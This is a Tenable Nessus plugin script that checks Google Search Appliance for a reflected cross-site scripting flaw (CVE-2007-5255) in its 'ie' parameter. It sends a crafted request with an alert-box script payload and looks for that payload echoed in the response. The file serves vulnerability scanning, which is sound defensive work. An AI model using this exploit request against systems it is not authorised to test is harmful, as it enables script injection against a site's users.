#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(26196);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-5255");
  script_bugtraq_id(25894);
  script_xref(name:"OSVDB", value:"37420");

  script_name(english:"Google Search Appliance ie Parameter Cross-Site Scripting Vulnerability");
  script_summary(english:"Checks for an XSS flaw in Google Search Appliance");

  desc = "
Synopsis :

The remote web server is affected by a cross-site scripting
vulnerability. 

Description :

The remote Google Search Appliance / Mini Search Appliance fails to
sanitize user-supplied input to the 'ie' parameter used in the search
interface.  An unauthenticated remote attacker may be able to leverage
this issue to inject arbitrary HTML or script code into a user's
browser to be executed within the security context of the affected
site. 

See also :

http://blogs.zdnet.com/security/?p=539
http://www.xssed.com/news/40/Google_Search_Appliance_is_vulnerable_to_XSS/
http://www.nessus.org/u?d4567b94 (requires credentials)

Solution :

Apply the fix as discussed in the vendor advisory referenced above. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("google_search_appliance_detect.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!get_kb_item("www/"+port+"/google_search_appliance")) exit(0);


# Send a request to determine how the appliance is configured.
req = http_get(item:"/", port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if (res == NULL) exit(0);


# If it looks like we're redirected to the search form...
if ("Location: /search?" >< res && "site=" >< res)
{
  # Extract the parameters.
  param_str = strstr(res, "Location: /search?") - "Location: /search?";
  param_str = param_str - strstr(param_str, '\r\n');

  params = make_array();
  while (strlen(param_str) > 0)
  {
    i = stridx(param_str, "&");
    if (i == -1)
    {
      p = param_str;
      param_str = "";
    }
    else if (i == 0) break;
    else 
    {
      p = substr(param_str, 0, i-1);
      param_str = substr(param_str, i+1);
    }

    i = stridx(p, "=");
    if (i > 0 && i < strlen(p)-1)
    {
      key = substr(p, 0, i-1);
      val = substr(p, i+1);
      params[key] = val;
    }
  }

  if (params["site"] && params["client"])
  {
    # Send a request to exploit the flaw.
    xss = string("<script>alert('", SCRIPT_NAME, "')</script>");

    req = http_get(
      item:string(
        "/search?",
        'ie=">', urlencode(str:xss), "&",
        "site=", params["site"], "&",
        "output=xml_no_dtd'&",
        "client=", params["client"], "&",
        "proxystylesheet=", params["proxystylesheet"], "'"
      ), 
      port:port  
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if our exploit appears along with the time in a form.
    if (
      string('">', xss, '><INPUT TYPE=hidden name=client') >< res ||
      string('input type="hidden" name="ie" value=">', xss, '>') >< res
    ) security_warning(port);
  }
}
